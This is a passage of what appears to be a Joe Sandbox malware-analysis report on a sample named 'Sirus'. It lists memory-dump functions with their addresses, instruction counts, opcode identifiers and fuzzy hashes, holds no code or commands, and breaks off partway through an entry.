                                                    • API String ID: 0-2747526811
                                                    • Opcode ID: b02501129f7c7d8570bf9b0495a5330765140dbbc9cfc731e7adf44cbdd932ad
                                                    • Instruction ID: a84851f094e7d35b5dda428379f09eb16f49f41598304fd7951d1656fdc3dea1
                                                    • Opcode Fuzzy Hash: b02501129f7c7d8570bf9b0495a5330765140dbbc9cfc731e7adf44cbdd932ad
                                                    • Instruction Fuzzy Hash: 4A11B1B5A002058FC711EB78C4059AFB7F6FFC4315B0089A9E616EB350EB30F9098B91
                                                    Function 05BF0006 Relevance: .5, Instructions: 463COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c970d94c7bcff0f9256d7ed57c7c376b1eaa97160825856a971a7a8f83a8d4d
                                                    • Instruction ID: aed0710b1dcc295b4232140086dbac173d03e3e91fb8cc0899d664a48ee1654c
                                                    • Opcode Fuzzy Hash: 7c970d94c7bcff0f9256d7ed57c7c376b1eaa97160825856a971a7a8f83a8d4d
                                                    • Instruction Fuzzy Hash: 34224DB4A05B474AD7746BA4848C39E7690FB05304FB04A9BC1FBCA367D734A09BDB49
                                                    Function 05BF0040 Relevance: .5, Instructions: 461COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eff94a166cb70ea769ca4d92958103b0300408660321489f09e21a86ff201fa1
                                                    • Instruction ID: ec98443889296aee818064f0b073a164452f419c545c0a46e12a91e11425c6b1
                                                    • Opcode Fuzzy Hash: eff94a166cb70ea769ca4d92958103b0300408660321489f09e21a86ff201fa1
                                                    • Instruction Fuzzy Hash: BB224EB4A05B474AD7746FA4848C29EB690FB05304FB04A9BC1FBC9367D734A09BDB49
                                                    Function 05BF75F0 Relevance: .2, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6dd446b466dca3080fe645706499e6ba5160c7d3ae239c2f0dd881ab583d7883
                                                    • Instruction ID: 6ce8298c4d7e0a9ae7f28761ee553031fcc6eba8e59aa6085530e3751099487b
                                                    • Opcode Fuzzy Hash: 6dd446b466dca3080fe645706499e6ba5160c7d3ae239c2f0dd881ab583d7883
                                                    • Instruction Fuzzy Hash: 1981E3387106108FCB08EF28D498D697BF6FF89605B2581A9E616CB375DB71EC45CB90
                                                    Function 05BFEB40 Relevance: .2, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07beac972a071595b8018ce8213b97df035626fcf2c639ae14261fb052c71933
                                                    • Instruction ID: eb2fb1cdcc36439f6d7dffe717230a39a636e4a6397d2c5af5727e6188dc2ab7
                                                    • Opcode Fuzzy Hash: 07beac972a071595b8018ce8213b97df035626fcf2c639ae14261fb052c71933
                                                    • Instruction Fuzzy Hash: C0818078A005149FCB04EFA4D4809BEBBF6FF49704F1481AAE906E7364EB35E846CB55
                                                    Function 05BFDD94 Relevance: .2, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbcd222ddf032d5522e7ef026fc1ede9075c045f52ab9593f702911361436922
                                                    • Instruction ID: 1b666d12afae84141e4d90bb90716f8ee8347dabf6752fa1a7a7cd07e48bc2ae
                                                    • Opcode Fuzzy Hash: cbcd222ddf032d5522e7ef026fc1ede9075c045f52ab9593f702911361436922
                                                    • Instruction Fuzzy Hash: E361C3757046448FCB16EB78C815ABE7BB6FF86310B0880AAE505DB2A1DF35AC49CB50
                                                    Function 05BFE560 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d3d8accbb771422157a4559d7e19a505d4e4c25792a6eb079af708262ac9a38
                                                    • Instruction ID: 5e56386ab22d7cd10f8046aeba6afb7f227dccd032b13f05b8130e59ed48685f
                                                    • Opcode Fuzzy Hash: 7d3d8accbb771422157a4559d7e19a505d4e4c25792a6eb079af708262ac9a38
                                                    • Instruction Fuzzy Hash: AF414870B142589FDB54DB69C894EADBBFAFF49604F1440A9E601EB3B1DB71E804CB50
                                                    Function 05BF7DD0 Relevance: .1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9bd83cbffd58e5b327910d755c1e035fc32f0d9ded882c908729d3aa866b7d9
                                                    • Instruction ID: 70800e43d2f967cd57549eadd50325ca92cb776322cbdfc13c749f61fecabea0
                                                    • Opcode Fuzzy Hash: c9bd83cbffd58e5b327910d755c1e035fc32f0d9ded882c908729d3aa866b7d9
                                                    • Instruction Fuzzy Hash: 9F418135E006048BDB28EFB4C4586BD7B76EF88314F1444E9D506BB344CF35698ACBA6
                                                    Function 05BFDE90 Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 744863a4fcad123764f56cb22e6c59c2791651a2bae8d1193aef58f7bd6086f3
                                                    • Instruction ID: 18b91572443dd2b9d2e3b64648b4c8e32d67b747c461a9ac537d55549db794ae
                                                    • Opcode Fuzzy Hash: 744863a4fcad123764f56cb22e6c59c2791651a2bae8d1193aef58f7bd6086f3
                                                    • Instruction Fuzzy Hash: 4F412C30B102099FDB14DFA8D854AADBBB2FF89310F1485A9E511BB3A4DB70ED45CB50
                                                    Function 05BFDE10 Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee9480e74c615bd1b1e4f862bbdd3405ac40d08667dc6e95d151093c7701ec14
                                                    • Instruction ID: a5324691ab1a73a9ff91236c8eac43615cb61807efa8f6e3b93d35a9bfefd1e9
                                                    • Opcode Fuzzy Hash: ee9480e74c615bd1b1e4f862bbdd3405ac40d08667dc6e95d151093c7701ec14
                                                    • Instruction Fuzzy Hash: A7410074B002058FDF08EBA9C854BFDBBB6FF48314F1494A9D606BB290DB31A845CB64
                                                    Function 05BF6C60 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58ace4a1603b2dfe91c0b0c085a501e2706f5091d2f2101a822175ceb57e7fa6
                                                    • Instruction ID: 9e641550356a4e927e3eefda2aa83144bdcc0eac8a8e531b10c8622334089f74
                                                    • Opcode Fuzzy Hash: 58ace4a1603b2dfe91c0b0c085a501e2706f5091d2f2101a822175ceb57e7fa6
                                                    • Instruction Fuzzy Hash: 9F41E874B042288FDF14DF68C895BDDB7B1FF49714F114099EA06AB3A5DB35A805CBA0
                                                    Function 05BFF9F7 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ed39f2010b259487772aa91cbf59f94bbd38c71e3a4c051e5d533bb35190bbe
                                                    • Instruction ID: 2ac1c9b909107a50a74721241ced123645a57f0c7d8dbf556dd9b7dd52848c9d
                                                    • Opcode Fuzzy Hash: 4ed39f2010b259487772aa91cbf59f94bbd38c71e3a4c051e5d533bb35190bbe
                                                    • Instruction Fuzzy Hash: 6A412E30B102089FDB14DFA8D454AADBBB2FF89310F1485A9E511BB3A4DB70ED45CB50
                                                    Function 05BFEB31 Relevance: .1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c8561d72f06e705fd38206b6bd93061d55edf439930492a6cd85c703c292a18
                                                    • Instruction ID: 90fca3450b6851591d57b9d37e8f5a18956cb9b01b32b5a8d45696f590b5f13a
                                                    • Opcode Fuzzy Hash: 1c8561d72f06e705fd38206b6bd93061d55edf439930492a6cd85c703c292a18
                                                    • Instruction Fuzzy Hash: 8C411F34A006058FCB50EF28D885ABDBBB9FF45304F1080AAE146DB365DB30E849CB85
                                                    Function 05BFF2D8 Relevance: .1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68df76ff74fe3ba7bd9a3d19e8a14f64b8f167853655cd3b9520c8fc05625c17
                                                    • Instruction ID: f30799b5d95e41777f6208e1ecc63a5a65b2faaf61aa23b07c510c722c193838
                                                    • Opcode Fuzzy Hash: 68df76ff74fe3ba7bd9a3d19e8a14f64b8f167853655cd3b9520c8fc05625c17
                                                    • Instruction Fuzzy Hash: 1A413E74A002058FDF18EBA9C854BFDBBB6FF49314F1490A9D606FB250DB30A849CB64
                                                    Function 05BFCCD2 Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0309255008e3c50918b0ccdf7393c1dcb0bfa181bad0cbb735aeb329cc9391
                                                    • Instruction ID: 62f2274c7af48086ea4bf48e71bd73e54d8b4e7c5916f9b1f5da2da1bf231111
                                                    • Opcode Fuzzy Hash: 0a0309255008e3c50918b0ccdf7393c1dcb0bfa181bad0cbb735aeb329cc9391
                                                    • Instruction Fuzzy Hash: F0213970E06218DFCB19DFA0E5995ADBF72FF49300F218499E452632A5CB30A999CB44
                                                    Function 05BF50B8 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68779c1072f93100fa16c3309937e8345c92990a3009ebf999e9a11950e9a65f
                                                    • Instruction ID: b2ff8feef9298105ae81c5a4fb4216bf3e70a9b2766a3bc059bf728270b6ecd2
                                                    • Opcode Fuzzy Hash: 68779c1072f93100fa16c3309937e8345c92990a3009ebf999e9a11950e9a65f
                                                    • Instruction Fuzzy Hash: 49313E75B002149FDB18DB59D8489AEBBF6EF8C710F2540A9E506E73A1DA31FD05CBA0
                                                    Function 05BF6EC0 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 38a8a0fdbb5b51b33970dbf9cf17dba610992032df44da27402ff2bf2b1f748d
                                                    • Instruction ID: a73f5df624603e7e36cbfad3156614b3010ade28b81c2eda2aeb744960fc136c
                                                    • Opcode Fuzzy Hash: 38a8a0fdbb5b51b33970dbf9cf17dba610992032df44da27402ff2bf2b1f748d
                                                    • Instruction Fuzzy Hash: 4E21EEB17087408BD335AB7588506267BA6EFC6341F0549ADDA52CB3D1EE25FC08CB21
                                                    Function 05BF7DC0 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c66dfd1fb34ad2128f6c792f9e563b657aa85704e2bc48bcf49beb218f88fdd8
                                                    • Instruction ID: 03c34cbe34ddf9b7336678abd2014cadd74c8cd53e18eb3a01d00c65070dd226
                                                    • Opcode Fuzzy Hash: c66dfd1fb34ad2128f6c792f9e563b657aa85704e2bc48bcf49beb218f88fdd8
                                                    • Instruction Fuzzy Hash: 2331A175E007048BDB19EF75C0446BD7AB7EB88704F1044E9C506A7394DF35A98A8BA6
                                                    Function 05BF5940 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc18994f71cf83cab6e77a15c408229cf54129ac580124faae1f46c44562a999
                                                    • Instruction ID: f9032cb0ee4149bc939bc41f110291af1e5fd6e1ed909c592a67f53a52401ed1
                                                    • Opcode Fuzzy Hash: cc18994f71cf83cab6e77a15c408229cf54129ac580124faae1f46c44562a999
                                                    • Instruction Fuzzy Hash: 582106767106104FEB28CB65C8C1ABE77E6FB84221F29806AD24697794D634FD81CB61
                                                    Function 05BFBB1F Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a9aca777dae393b04609f665e2010ce0fc904823fb62afb9f5d4187eff7fb40
                                                    • Instruction ID: 9100577322517727740af747db221cdd50f4a2cb9ba3b66089bd0bfb3a80d84f
                                                    • Opcode Fuzzy Hash: 1a9aca777dae393b04609f665e2010ce0fc904823fb62afb9f5d4187eff7fb40
                                                    • Instruction Fuzzy Hash: 782141B1F001199BDB14DBA9CD44ABFBBFAFF88240F14855AE615E3254EB709A058B90
                                                    Function 05BF5950 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d24d37530261deb864395cf07c4da18bffca9f49720ce3ee5b36ef4f75ccd5a
                                                    • Instruction ID: 4701b255486620874e819ddaaf3632dc7e31c33148733b1e1e83e34fcb726a72
                                                    • Opcode Fuzzy Hash: 7d24d37530261deb864395cf07c4da18bffca9f49720ce3ee5b36ef4f75ccd5a
                                                    • Instruction Fuzzy Hash: 7021F9367106104FEF38CA69C8C1A7E77E6FBC4220B24846AD24793794D634FD81CB61
                                                    Function 05BF75E0 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b33e955e9832c8b10f87ca87fff572d4cf2be1d5d449b27ec23d09ac1464fa0
                                                    • Instruction ID: 67edfaa79cf7f2d2d919cb106db559913d9258c9eeecab6e62e0060bce66364d
                                                    • Opcode Fuzzy Hash: 7b33e955e9832c8b10f87ca87fff572d4cf2be1d5d449b27ec23d09ac1464fa0
                                                    • Instruction Fuzzy Hash: D9210C397105148FCB04DB68D49899D7BF6EF89A0171541AAEA16CB371DF71ED06CB80
                                                    Function 05BF1480 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a59a9705a9e37f441067f22163486b3eced9253f80fb8b5235f244aa7242321f
                                                    • Instruction ID: 58e023afa72e6c7ac1ba65f4584d7103ebc887fa4e1cb53724d19f734701f51d
                                                    • Opcode Fuzzy Hash: a59a9705a9e37f441067f22163486b3eced9253f80fb8b5235f244aa7242321f
                                                    • Instruction Fuzzy Hash: 73315578A00209DFCB04DFA8D994AADBBB6FF88301F508569D419AB395DB346E05CF51
                                                    Function 00C7D1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976104140.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c7d000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9dce44915dfd4684a2c05edac32a04ac0c43820d02c452322734bd2918d5ca0
                                                    • Instruction ID: eadcc2d9b7cf83e0fb6a2dfc6faddc6d76e4c13376f30a80c97c19d89b4d945f
                                                    • Opcode Fuzzy Hash: b9dce44915dfd4684a2c05edac32a04ac0c43820d02c452322734bd2918d5ca0
                                                    • Instruction Fuzzy Hash: EB21AFB5604204AFDB05DF14D984B26BBB5FF94324F24CAA9E94E4B292C336DC46CA61
                                                    Function 00C7D01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976104140.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c7d000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49ec0112df3fb42d0a7e416d49f6ea57bb4ff849f6e465f97a005dabc0332ea8
                                                    • Instruction ID: cf79c0964485aed063f640b55f1c4a224ffac4ec2fb05996ea45f53526fbe68f
                                                    • Opcode Fuzzy Hash: 49ec0112df3fb42d0a7e416d49f6ea57bb4ff849f6e465f97a005dabc0332ea8
                                                    • Instruction Fuzzy Hash: DA21CF756042009FCB14DF14D984B26BBB5EB94314F24C969E80E4B286C33AD806CA61
                                                    Function 05BFB478 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 084d605531693772ef465a72a73a0198d4ccaef0aa2a6ee5c8f671a3a11dec97
                                                    • Instruction ID: f69008466c6d2542e57c908cc11323551705f07b8c1bae1dd9a043754edd089c
                                                    • Opcode Fuzzy Hash: 084d605531693772ef465a72a73a0198d4ccaef0aa2a6ee5c8f671a3a11dec97
                                                    • Instruction Fuzzy Hash: 5F2184B6F002099FDF05DBA9C9846FEB7B7FF88340B544526D509E7244EB349A058BA1
                                                    Function 05BFF089 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7dffd6e6f5586669266083dd5310ade8e514183c9d150e8b090577f442a67b5b
                                                    • Instruction ID: 808cb081e5e51c85884abc8bf423ce5fe96740548f4cf905d1adaf23739775f0
                                                    • Opcode Fuzzy Hash: 7dffd6e6f5586669266083dd5310ade8e514183c9d150e8b090577f442a67b5b
                                                    • Instruction Fuzzy Hash: E021A171B006058FDB10EF29C845BBEB7B9FF84764F1441A9E516E7290EB34E945CB90
                                                    Function 05BF50A8 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a80b4fe5ccf8f90564d79a0dcc1e7f4e1e4e7ad991d40548987918e492dba99
                                                    • Instruction ID: 459e9fa1a1d3295400a69a5cb95bc957d2907224af2598b405bf06e5090da2fb
                                                    • Opcode Fuzzy Hash: 7a80b4fe5ccf8f90564d79a0dcc1e7f4e1e4e7ad991d40548987918e492dba99
                                                    • Instruction Fuzzy Hash: C9116075B001149FDB18DA5DC844C9AB7F6EF8C320B1680E9E909EB361EA31FC05CBA0
                                                    Function 05BFDEB0 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f0ddd45a1716edcee5a084bd27922aed0d89551f98003b13e8d569eaa165dd8
                                                    • Instruction ID: 9158fca98c251cf99de9ebb80e914a1c3d9ae27d5330083f61f54ed9bf62fc9a
                                                    • Opcode Fuzzy Hash: 2f0ddd45a1716edcee5a084bd27922aed0d89551f98003b13e8d569eaa165dd8
                                                    • Instruction Fuzzy Hash: 2011E771F54116EBCF116A54D5441FD7FB1EB40348B604CE5C689F3284F23095388B95
                                                    Function 05BF14A8 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce5e9f6d6ca97e70228dcf76187d2b37732fc7c9b4b9d5c7579b8703f9ac6dbe
                                                    • Instruction ID: 300ab2c7ea0bbf00975818c3168fb6aaa4733d042ed44d2f65064cac00c8a8f6
                                                    • Opcode Fuzzy Hash: ce5e9f6d6ca97e70228dcf76187d2b37732fc7c9b4b9d5c7579b8703f9ac6dbe
                                                    • Instruction Fuzzy Hash: 01210E78A002099FCB04EFA8D984AADBBF6FF88300F508569E419AB354DB346A45CF51
                                                    Function 00C7D005 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976104140.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c7d000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1628190798f2e7ac9210439938b5ca7a3e5fd5cba057066bcc6879b9f8f4919
                                                    • Instruction ID: 6f2719fcce61738deb9a62dedc76ddd21d48aaf55a96dd6d3841cf0b414cdebe
                                                    • Opcode Fuzzy Hash: a1628190798f2e7ac9210439938b5ca7a3e5fd5cba057066bcc6879b9f8f4919
                                                    • Instruction Fuzzy Hash: BC2150755093808FDB12CF24D994715BF71EF46314F28C5EAD84A8B6A7C33A990ACB62
                                                    Function 05BF5A90 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4b6b636ee3e0ebd0eedfbeafb74738571104b2ecbb378db5fe541178955a61a
                                                    • Instruction ID: f242c60dd4e83022b686d46c4765d8e962070bb14161638a108ac0ba5ff1fe7a
                                                    • Opcode Fuzzy Hash: c4b6b636ee3e0ebd0eedfbeafb74738571104b2ecbb378db5fe541178955a61a
                                                    • Instruction Fuzzy Hash: E31199B5E0011A9FCB44DFADC4849AEBBF5FF89310B15816AE918E7315E7309915CBA0
                                                    Function 00C7D1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976104140.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
